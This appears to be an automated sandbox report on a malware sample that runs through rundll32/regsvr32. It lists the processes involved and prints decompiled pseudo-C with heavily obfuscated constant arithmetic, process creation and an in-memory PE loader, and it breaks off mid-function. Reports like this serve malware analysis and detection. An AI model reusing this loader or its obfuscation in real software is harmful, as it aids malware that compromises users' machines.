Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Twpdaikokj\mcaqvcjuoohw.tdj",DllRegisterServer
Imagebase:	0x920000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6268 Parent PID: 568

General

Start time:	14:40:20
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 7136 Parent PID: 568

General

Start time:	14:40:35
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 5328 Parent PID: 568

General

Start time:	14:40:49
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6636 Parent PID: 568

General

Start time:	14:40:58
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 5608 Parent PID: 3436 regsvr32.exeCOMMON

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	5.8%
Signature Coverage:	12.9%
Total number of Nodes:	325
Total number of Limit Nodes:	22

Executed Functions

Function 04B4EFDD, Relevance: 12.9, Strings: 10, Instructions: 360
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E04B4EFDD() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed short* _t381;
				signed int _t393;
				signed int _t395;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t415;
				signed int* _t444;
				void* _t445;
				signed int _t449;
				signed int _t450;
				signed short* _t451;
				signed int* _t452;

				_t452 =  &_v1720;
				_v1648 = 0xf9e68a;
				_v1648 = _v1648 ^ 0xa89cfd85;
				_v1648 = _v1648 | 0xe1599fd2;
				_v1648 = _v1648 ^ 0xe97d9ff6;
				_v1592 = 0x52ca29;
				_v1592 = _v1592 + 0xa8c7;
				_v1592 = _v1592 ^ 0x005b0974;
				_v1632 = 0x5fd17f;
				_t397 = 0x55;
				_v1632 = _v1632 / _t397;
				_v1632 = _v1632 + 0x4a14;
				_t395 = 0;
				_v1632 = _v1632 ^ 0x0007d59d;
				_t445 = 0x5f4d19a;
				_v1584 = 0xb2803c;
				_t398 = 0x15;
				_v1584 = _v1584 / _t398;
				_v1584 = _v1584 ^ 0x0001d429;
				_v1700 = 0x18b17c;
				_v1700 = _v1700 >> 4;
				_v1700 = _v1700 << 0xb;
				_v1700 = _v1700 | 0x5bcbde76;
				_v1700 = _v1700 ^ 0x5fd8859a;
				_v1716 = 0x3ed9a0;
				_v1716 = _v1716 >> 2;
				_v1716 = _v1716 | 0xf2214935;
				_v1716 = _v1716 + 0xffff6098;
				_v1716 = _v1716 ^ 0xf2246cf7;
				_v1616 = 0xd3100b;
				_v1616 = _v1616 << 0xb;
				_v1616 = _v1616 ^ 0x988d1f7d;
				_v1576 = 0x49dab3;
				_t399 = 0x41;
				_v1576 = _v1576 / _t399;
				_v1576 = _v1576 ^ 0x00091b0c;
				_v1604 = 0x610b2e;
				_v1604 = _v1604 >> 3;
				_v1604 = _v1604 ^ 0x000d4028;
				_v1708 = 0x5e4148;
				_v1708 = _v1708 * 0x7c;
				_v1708 = _v1708 + 0x543c;
				_v1708 = _v1708 * 0x6e;
				_v1708 = _v1708 ^ 0x9e2c7101;
				_v1580 = 0x8fa7d1;
				_v1580 = _v1580 | 0x5a90bc2e;
				_v1580 = _v1580 ^ 0x5a99780a;
				_v1644 = 0xdfbfec;
				_v1644 = _v1644 ^ 0x5e27e596;
				_v1644 = _v1644 + 0xffff45c7;
				_v1644 = _v1644 ^ 0x5efb0694;
				_v1652 = 0xa5c8eb;
				_v1652 = _v1652 ^ 0x9b43bc99;
				_v1652 = _v1652 * 0x26;
				_v1652 = _v1652 ^ 0x243194e2;
				_v1596 = 0xb87d2a;
				_v1596 = _v1596 ^ 0x06815b6e;
				_v1596 = _v1596 ^ 0x0639024b;
				_v1568 = 0xf0e227;
				_v1568 = _v1568 * 0x3d;
				_v1568 = _v1568 ^ 0x396ce50f;
				_v1572 = 0x747c0d;
				_v1572 = _v1572 + 0xffffb798;
				_v1572 = _v1572 ^ 0x0071a7b9;
				_v1656 = 0x3795ed;
				_v1656 = _v1656 | 0xbce94746;
				_t400 = 0x26;
				_v1656 = _v1656 / _t400;
				_v1656 = _v1656 ^ 0x04ffd641;
				_v1628 = 0xc97098;
				_t401 = 0x3f;
				_v1628 = _v1628 / _t401;
				_v1628 = _v1628 << 2;
				_v1628 = _v1628 ^ 0x0000c1e6;
				_v1664 = 0x186675;
				_v1664 = _v1664 + 0x5979;
				_v1664 = _v1664 + 0xda5e;
				_v1664 = _v1664 ^ 0x0013e2ca;
				_v1672 = 0x37994d;
				_t402 = 0x3c;
				_v1672 = _v1672 / _t402;
				_v1672 = _v1672 << 6;
				_v1672 = _v1672 ^ 0x0033bfe5;
				_v1588 = 0x8a41f;
				_v1588 = _v1588 ^ 0x744a78fd;
				_v1588 = _v1588 ^ 0x744e2179;
				_v1720 = 0x535779;
				_v1720 = _v1720 << 0xd;
				_v1720 = _v1720 + 0x4332;
				_v1720 = _v1720 + 0x735f;
				_v1720 = _v1720 ^ 0x6aed3196;
				_v1692 = 0x449a24;
				_t403 = 0x7f;
				_v1692 = _v1692 / _t403;
				_v1692 = _v1692 >> 0xb;
				_v1692 = _v1692 | 0x1a1cc036;
				_v1692 = _v1692 ^ 0x1a141e74;
				_v1680 = 0xcbdb4c;
				_t404 = 0x32;
				_v1680 = _v1680 / _t404;
				_v1680 = _v1680 + 0xffff62cd;
				_v1680 = _v1680 ^ 0x0005b6c2;
				_v1712 = 0x490fe1;
				_v1712 = _v1712 + 0xffff5c72;
				_v1712 = _v1712 | 0x8d0799de;
				_v1712 = _v1712 + 0xd1c7;
				_v1712 = _v1712 ^ 0x8d59d7bd;
				_v1564 = 0xeb31a6;
				_v1564 = _v1564 + 0x9db9;
				_v1564 = _v1564 ^ 0x00ef2ed2;
				_v1636 = 0x2bc790;
				_v1636 = _v1636 << 0xd;
				_v1636 = _v1636 + 0xc361;
				_v1636 = _v1636 ^ 0x78fc9b03;
				_v1608 = 0x9c27ff;
				_t405 = 0x79;
				_v1608 = _v1608 / _t405;
				_v1608 = _v1608 ^ 0x00083646;
				_v1612 = 0x2811b5;
				_v1612 = _v1612 << 7;
				_v1612 = _v1612 ^ 0x140bb062;
				_v1704 = 0x10f563;
				_v1704 = _v1704 << 7;
				_v1704 = _v1704 + 0x8e91;
				_v1704 = _v1704 >> 1;
				_v1704 = _v1704 ^ 0x043150d1;
				_v1668 = 0xd17281;
				_v1668 = _v1668 + 0xffff6975;
				_v1668 = _v1668 * 5;
				_v1668 = _v1668 ^ 0x041d3199;
				_v1676 = 0x45cf94;
				_v1676 = _v1676 | 0xf5b6f9ff;
				_v1676 = _v1676 ^ 0xf5f7fea4;
				_v1640 = 0xed0f5a;
				_v1640 = _v1640 | 0x16dcab92;
				_v1640 = _v1640 ^ 0xea8ad617;
				_v1640 = _v1640 ^ 0xfc77378a;
				_v1684 = 0xfd4b0d;
				_v1684 = _v1684 ^ 0xf5deb09c;
				_v1684 = _v1684 * 0x14;
				_v1684 = _v1684 ^ 0x26c6ef50;
				_v1600 = 0xb07e76;
				_v1600 = _v1600 + 0x891d;
				_v1600 = _v1600 ^ 0x00bcbcf5;
				_v1660 = 0xdc9573;
				_v1660 = _v1660 | 0xf03871f4;
				_v1660 = _v1660 >> 9;
				_v1660 = _v1660 ^ 0x0071eac7;
				_v1620 = 0x8203d2;
				_v1620 = _v1620 ^ 0xa8466021;
				_v1620 = _v1620 ^ 0xa8c8da0e;
				_v1688 = 0x3e6237;
				_v1688 = _v1688 + 0x1a50;
				_v1688 = _v1688 >> 3;
				_t451 = _v1620;
				_v1688 = _v1688 * 0x2f;
				_v1688 = _v1688 ^ 0x0160f017;
				_v1696 = 0x29d1f1;
				_v1696 = _v1696 + 0xffffde63;
				_v1696 = _v1696 + 0xffff46cf;
				_v1696 = _v1696 * 0x14;
				_v1696 = _v1696 ^ 0x033cdd59;
				_v1624 = 0xc011c7;
				_v1624 = _v1624 + 0xffff119f;
				_v1624 = _v1624 >> 7;
				_v1624 = _v1624 ^ 0x00036cbb;
				while(_t445 != 0x2906f2f) {
					if(_t445 == 0x5f4d19a) {
						E04B4FE2A(_v1592, _v1632, 0x208,  &_v1560);
						_pop(_t405);
						_t445 = 0x2906f2f;
						continue;
					}
					if(_t445 == 0x6d37c50) {
						_t381 = _t451;
						__eflags =  *_t451 - _t395;
						if(__eflags == 0) {
							L17:
							_t445 = 0xfe0ac9e;
							continue;
						} else {
							goto L10;
						}
						do {
							L10:
							__eflags =  *_t381 - 0x2c;
							if( *_t381 != 0x2c) {
								goto L16;
							}
							_t444 =  &_v1560;
							while(1) {
								_t381 =  &(_t381[1]);
								_t415 =  *_t381 & 0x0000ffff;
								__eflags = _t415;
								if(_t415 == 0) {
									break;
								}
								__eflags = _t415 - 0x20;
								if(_t415 == 0x20) {
									break;
								}
								 *_t444 = _t415;
								_t444 =  &(_t444[0]);
								__eflags = _t444;
							}
							_t405 = 0;
							__eflags = 0;
							 *_t444 = 0;
							L16:
							_t381 =  &(_t381[1]);
							__eflags =  *_t381 - _t395;
						} while (__eflags != 0);
						goto L17;
					}
					if(_t445 == 0x88437ca) {
						E04B31A34(_v1572,  &_v1040, _t405, _t405, _v1656, _v1628, _v1664, _t405, _v1648, _v1672); // executed
						E04B50DB1(_v1588,  &_v520, __eflags, _v1720, _v1572, _v1692);
						_push(_v1636);
						_push(_v1564);
						_push(_v1712);
						_t449 = E04B4E1F8(0x4b31160, _v1680, __eflags);
						E04B52D0A(_v1612, __eflags,  &_v520, _v1704, _v1668, _v1676, 0x4b31160, _t451,  &_v1040, _t449);
						_t405 = _t449;
						E04B4FECB(_t405, _v1640, _v1684, _v1600, _v1660);
						_t452 =  &(_t452[0x19]);
						_t445 = 0xc3a6a1c;
						continue;
					}
					if(_t445 == 0xc3a6a1c) {
						_push(_t405);
						E04B485FF(_v1620, _v1688, __eflags, _t395, _t451, _t395, _v1696, _t395, _v1624); // executed
						_t395 = 1;
						__eflags = 1;
						L23:
						return _t395;
					}
					_t462 = _t445 - 0xfe0ac9e;
					if(_t445 == 0xfe0ac9e) {
						_push(_v1576);
						_push(_v1616);
						_push(_v1716);
						_t450 = E04B4E1F8(0x4b31120, _v1700, _t462);
						_t393 = E04B5061D(_v1604, _t450,  &_v1560, _v1708, _v1580); // executed
						_t405 = _t450;
						asm("sbb edi, edi");
						_t445 = ( ~_t393 & 0x02221bd6) + 0x6621bf4;
						E04B4FECB(_t405, _v1644, _v1652, _v1596, _v1568);
						_t452 =  &(_t452[9]);
					}
					L20:
					if(_t445 != 0x6621bf4) {
						continue;
					}
					goto L23;
				}
				_t451 = L04B3C307();
				_t445 = 0x6d37c50;
				goto L20;
			}

0x04b4efdd
0x04b4efe3
0x04b4efed
0x04b4eff5
0x04b4effd
0x04b4f005
0x04b4f010
0x04b4f01b
0x04b4f026
0x04b4f038
0x04b4f03d
0x04b4f043
0x04b4f04b
0x04b4f04d
0x04b4f055
0x04b4f05a
0x04b4f06c
0x04b4f071
0x04b4f07a
0x04b4f085
0x04b4f08d
0x04b4f092
0x04b4f097
0x04b4f09f
0x04b4f0a7
0x04b4f0af
0x04b4f0b4
0x04b4f0bc
0x04b4f0c4
0x04b4f0cc
0x04b4f0d4
0x04b4f0d9
0x04b4f0e1
0x04b4f0f3
0x04b4f0f6
0x04b4f0fd
0x04b4f108
0x04b4f113
0x04b4f11b
0x04b4f126
0x04b4f133
0x04b4f137
0x04b4f144
0x04b4f148
0x04b4f150
0x04b4f15b
0x04b4f166
0x04b4f171
0x04b4f179
0x04b4f181
0x04b4f189
0x04b4f191
0x04b4f199
0x04b4f1a6
0x04b4f1aa
0x04b4f1b2
0x04b4f1bd
0x04b4f1c8
0x04b4f1d3
0x04b4f1e6
0x04b4f1ed
0x04b4f1f8
0x04b4f203
0x04b4f210
0x04b4f21b
0x04b4f223
0x04b4f231
0x04b4f236
0x04b4f23c
0x04b4f244
0x04b4f250
0x04b4f255
0x04b4f25b
0x04b4f260
0x04b4f268
0x04b4f270
0x04b4f278
0x04b4f280
0x04b4f288
0x04b4f294
0x04b4f299
0x04b4f29f
0x04b4f2a4
0x04b4f2ac
0x04b4f2b7
0x04b4f2c2
0x04b4f2cd
0x04b4f2d5
0x04b4f2da
0x04b4f2e2
0x04b4f2ea
0x04b4f2f2
0x04b4f2fe
0x04b4f303
0x04b4f309
0x04b4f30e
0x04b4f316
0x04b4f31e
0x04b4f32a
0x04b4f32f
0x04b4f335
0x04b4f33d
0x04b4f345
0x04b4f34d
0x04b4f355
0x04b4f35d
0x04b4f365
0x04b4f36d
0x04b4f378
0x04b4f383
0x04b4f38e
0x04b4f396
0x04b4f39b
0x04b4f3a3
0x04b4f3ab
0x04b4f3bd
0x04b4f3c0
0x04b4f3c7
0x04b4f3d2
0x04b4f3da
0x04b4f3df
0x04b4f3e7
0x04b4f3ef
0x04b4f3f4
0x04b4f3fc
0x04b4f400
0x04b4f408
0x04b4f410
0x04b4f41d
0x04b4f421
0x04b4f429
0x04b4f431
0x04b4f439
0x04b4f441
0x04b4f449
0x04b4f451
0x04b4f459
0x04b4f461
0x04b4f469
0x04b4f476
0x04b4f47a
0x04b4f482
0x04b4f48d
0x04b4f498
0x04b4f4a3
0x04b4f4ab
0x04b4f4b3
0x04b4f4b8
0x04b4f4c0
0x04b4f4c8
0x04b4f4d0
0x04b4f4d8
0x04b4f4e0
0x04b4f4e8
0x04b4f4f2
0x04b4f4f6
0x04b4f4fa
0x04b4f502
0x04b4f50a
0x04b4f512
0x04b4f51f
0x04b4f523
0x04b4f52b
0x04b4f533
0x04b4f53b
0x04b4f540
0x04b4f548
0x04b4f55a
0x04b4f72e
0x04b4f734
0x04b4f735
0x00000000
0x04b4f735
0x04b4f566
0x04b4f6d1
0x04b4f6d3
0x04b4f6d7
0x04b4f70c
0x04b4f70c
0x00000000
0x00000000
0x00000000
0x00000000
0x04b4f6d9
0x04b4f6d9
0x04b4f6d9
0x04b4f6dd
0x00000000
0x00000000
0x04b4f6df
0x04b4f6f4
0x04b4f6f4
0x04b4f6f7
0x04b4f6fa
0x04b4f6fd
0x00000000
0x00000000
0x04b4f6e8
0x04b4f6ec
0x00000000
0x00000000
0x04b4f6ee
0x04b4f6f1
0x04b4f6f1
0x04b4f6f1
0x04b4f6ff
0x04b4f6ff
0x04b4f701
0x04b4f704
0x04b4f704
0x04b4f707
0x04b4f707
0x00000000
0x04b4f6d9
0x04b4f572
0x04b4f62f
0x04b4f64e
0x04b4f653
0x04b4f65c
0x04b4f663
0x04b4f673
0x04b4f6a2
0x04b4f6ab
0x04b4f6bf
0x04b4f6c4
0x04b4f6c7
0x00000000
0x04b4f6c7
0x04b4f57e
0x04b4f760
0x04b4f778
0x04b4f782
0x04b4f782
0x04b4f786
0x04b4f78f
0x04b4f78f
0x04b4f584
0x04b4f58a
0x04b4f590
0x04b4f59c
0x04b4f5a0
0x04b4f5b4
0x04b4f5cb
0x04b4f5d9
0x04b4f5ef
0x04b4f5f7
0x04b4f5fd
0x04b4f602
0x04b4f602
0x04b4f752
0x04b4f758
0x00000000
0x00000000
0x00000000
0x04b4f75e
0x04b4f74b
0x04b4f74d
0x00000000

Strings

|t, xrefs: 04B4F1F8
y!Nt, xrefs: 04B4F2C2
t[, xrefs: 04B4F01B
HA^, xrefs: 04B4F126
yWS, xrefs: 04B4F2CD
(@, xrefs: 04B4F11B
_s, xrefs: 04B4F2E2
<T, xrefs: 04B4F137
7b>, xrefs: 04B4F4D8
yY, xrefs: 04B4F270

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: |t$(@$7b>$<T$HA^$_s$t[$y!Nt$yWS$yY
API String ID: 0-3414766599
Opcode ID: e2a2f327e155e5c20b9a5b01af1a172f32e648a15aecbf2788f64851c1e41073
Instruction ID: 19a0b029c92fe295f8030dabeb55747e1494aca6c7a26c1514d4be366bf93aa3
Opcode Fuzzy Hash: e2a2f327e155e5c20b9a5b01af1a172f32e648a15aecbf2788f64851c1e41073
Instruction Fuzzy Hash: 010211725083809FD3A8CF25C48AA5BBBF2FBC5318F10890DE6D986260D7B59949DF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B485FF, Relevance: 5.1, Strings: 4, Instructions: 142
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E04B485FF(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v76;
				char _v80;
				char _v148;
				void* _t125;
				void* _t141;
				signed int _t148;
				signed int _t149;
				intOrPtr _t165;
				char _t166;

				_t165 = _a4;
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_t165);
				_push(__edx);
				_push(__ecx);
				E04B4FE29(_t125);
				_v56 = _v56 & 0x00000000;
				_v64 = 0x4c8eee;
				_v60 = 0xd08445;
				_v12 = 0x2b5b52;
				_v12 = _v12 << 0xa;
				_v12 = _v12 ^ 0x243df932;
				_t148 = 0x1b;
				_v12 = _v12 / _t148;
				_v12 = _v12 ^ 0x0511db29;
				_v32 = 0x4cbd6f;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0x02619ccd;
				_v8 = 0x229cdc;
				_v8 = _v8 ^ 0x1dfe7fc6;
				_v8 = _v8 + 0x780d;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x0ee175b3;
				_v40 = 0x8e82d1;
				_v40 = _v40 + 0xffffcc21;
				_t149 = 0x39;
				_v40 = _v40 * 0x69;
				_v40 = _v40 ^ 0x3a51eacf;
				_v20 = 0xb8087c;
				_v20 = _v20 * 0x23;
				_v20 = _v20 >> 5;
				_v20 = _v20 ^ 0x00c96169;
				_v24 = 0x5c9964;
				_v24 = _v24 / _t149;
				_v24 = _v24 >> 7;
				_v24 = _v24 ^ 0x00085b7f;
				_v36 = 0xf34403;
				_v36 = _v36 * 0x6a;
				_v36 = _v36 | 0x7504e0f6;
				_v36 = _v36 ^ 0x75b6ad40;
				_v28 = 0x74a083;
				_v28 = _v28 * 0x7e;
				_v28 = _v28 >> 6;
				_v28 = _v28 ^ 0x00e859e6;
				_v48 = 0x5be020;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x02dd1a4a;
				_v44 = 0xfc2deb;
				_v44 = _v44 + 0x1b3b;
				_v44 = _v44 ^ 0x00f2ef0d;
				_v52 = 0x7de099;
				_v52 = _v52 ^ 0xb346769d;
				_v52 = _v52 ^ 0xb330844a;
				_v16 = 0x4076ee;
				_v16 = _v16 * 0xa;
				_v16 = _v16 * 0x14;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0x2e751909;
				_t150 = _v12;
				_push( &_v148);
				_t166 = 0x44;
				_push(_t166);
				E04B4FE2A(_v12, _v32);
				_v148 = _t166;
				_t141 = E04B52C24(_a8, _v8, _v12, _t150, _v40, _t150, _v20, _a20, _v24,  &_v148, _t150, _v36, _v28, _t150, _a12,  &_v80); // executed
				if(_t141 == 0) {
					return 0;
				}
				if(_t165 == 0) {
					E04B51538(_v48, _v44, _v80);
					E04B51538(_v52, _v16, _v76);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				return 1;
			}

0x04b4860a
0x04b4860d
0x04b4860f
0x04b48612
0x04b48615
0x04b48618
0x04b4861b
0x04b4861e
0x04b4861f
0x04b48620
0x04b48621
0x04b48626
0x04b4862c
0x04b48633
0x04b4863a
0x04b48641
0x04b48645
0x04b48651
0x04b48656
0x04b4865b
0x04b48662
0x04b48669
0x04b4866d
0x04b48671
0x04b48678
0x04b4867f
0x04b48686
0x04b4868d
0x04b48690
0x04b48697
0x04b4869e
0x04b486a9
0x04b486aa
0x04b486ad
0x04b486b4
0x04b486bf
0x04b486c2
0x04b486c6
0x04b486cd
0x04b486d9
0x04b486dc
0x04b486e0
0x04b486e7
0x04b486f2
0x04b486f5
0x04b486fc
0x04b48703
0x04b4870e
0x04b48711
0x04b48715
0x04b4871c
0x04b48723
0x04b48727
0x04b4872e
0x04b48735
0x04b4873c
0x04b48743
0x04b4874a
0x04b48751
0x04b48758
0x04b48763
0x04b4876a
0x04b48773
0x04b48777
0x04b48781
0x04b48784
0x04b48787
0x04b48788
0x04b48789
0x04b48791
0x04b487c2
0x04b487cc
0x00000000
0x04b487fe
0x04b487d0
0x04b487e7
0x04b487f5
0x04b487d2
0x04b487d5
0x04b487d6
0x04b487d7
0x04b487d8
0x04b487d8
0x00000000

Strings

[, xrefs: 04B4871C
Y, xrefs: 04B48715
v@, xrefs: 04B48758
R[+, xrefs: 04B4863A

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: [$R[+$Y$v@
API String ID: 963392458-1276245682
Opcode ID: efe08f301ab2b251a86e33dfee0dd2d26676926c88cc055a74a7a241cd428695
Instruction ID: f88e775ba9cce3d232680d66d146210902febe4808e251bf2b52ad2c65d59a68
Opcode Fuzzy Hash: efe08f301ab2b251a86e33dfee0dd2d26676926c88cc055a74a7a241cd428695
Instruction Fuzzy Hash: 8A615472C00209EFCF08DFE5D94AAEEBBB5FB48304F108099E911B6250D7B56A55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 10002900, Relevance: 22.8, APIs: 15, Instructions: 331
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E10002900(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				signed short* _v16;
				void* _v20;
				void* _v24;
				long _v28;
				signed int _v32;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr* _v80;
				intOrPtr _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t180;
				void* _t191;
				void* _t198;
				void* _t202;
				intOrPtr _t209;
				void* _t220;
				intOrPtr _t269;
				intOrPtr _t278;
				intOrPtr _t326;

				_v100 = __ecx;
				_v72 = 0;
				_v20 = 0;
				if(E10001FE0(_v100, _a8, 0x40) != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t10 =  &(_v16[0x1e]); // 0x47e81005
						if(E10001FE0(_v100, _a8,  *_t10 + 0xf8) != 0) {
							_t15 =  &(_v16[0x1e]); // 0x47e81005
							_v80 = _a4 +  *_t15;
							if( *_v80 == 0x4550) {
								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
										_v32 =  *(_v80 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
											} else {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
											}
											if(_v88 > _v20) {
												_v20 = _v88;
											}
											_v12 = _v12 + 1;
											_v84 = _v84 + 0x28;
										}
										__imp__GetNativeSystemInfo( &_v68); // executed
										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _v64 - 0x00000001 &  !(_v64 - 1);
										_t65 = _v64 - 1; // -1
										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
											_v24 = _t180;
											if(_v24 != 0) {
												L26:
												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
												if(_v72 != 0) {
													 *((intOrPtr*)(_v72 + 4)) = _v24;
													asm("sbb edx, edx");
													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
													if(E10001FE0(_v100, _a8,  *(_v80 + 0x54)) != 0) {
														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
														_v8 = _t191;
														E10001E60(_v8, _v16,  *(_v80 + 0x54));
														_t115 =  &(_v16[0x1e]); // 0x47e81005
														 *_v72 = _v8 +  *_t115;
														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
														_t198 = E10002010(_v100, _a4, _a8, _v80, _v72); // executed
														if(_t198 != 0) {
															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
															_v76 = _t269;
															if(_t269 == 0) {
																 *((intOrPtr*)(_v72 + 0x18)) = 1;
															} else {
																 *((intOrPtr*)(_v72 + 0x18)) = E10002500(_v100, _v72, _v76);
															}
															if(E10002670(_v100, _v72) != 0) {
																_t202 = E10002300(_v100, _v72); // executed
																if(_t202 != 0) {
																	if(E10002480(_v100, _v72) != 0) {
																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
																			 *(_v72 + 0x2c) = 0;
																			L49:
																			return _v72;
																		}
																		if( *(_v72 + 0x14) == 0) {
																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																		_t209 =  *0x10058ed8; // 0x0
																		_t278 =  *0x10058ed4; // 0x1
																		_t326 =  *0x10058ed0; // 0x10000000
																		_v92 = _v96(_t326, _t278, _t209);
																		if(_v92 != 0) {
																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E10002EC0(_v100, _v72);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												VirtualFree(_v24, 0, 0x8000);
												SetLastError(0xe);
												return 0;
											}
											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
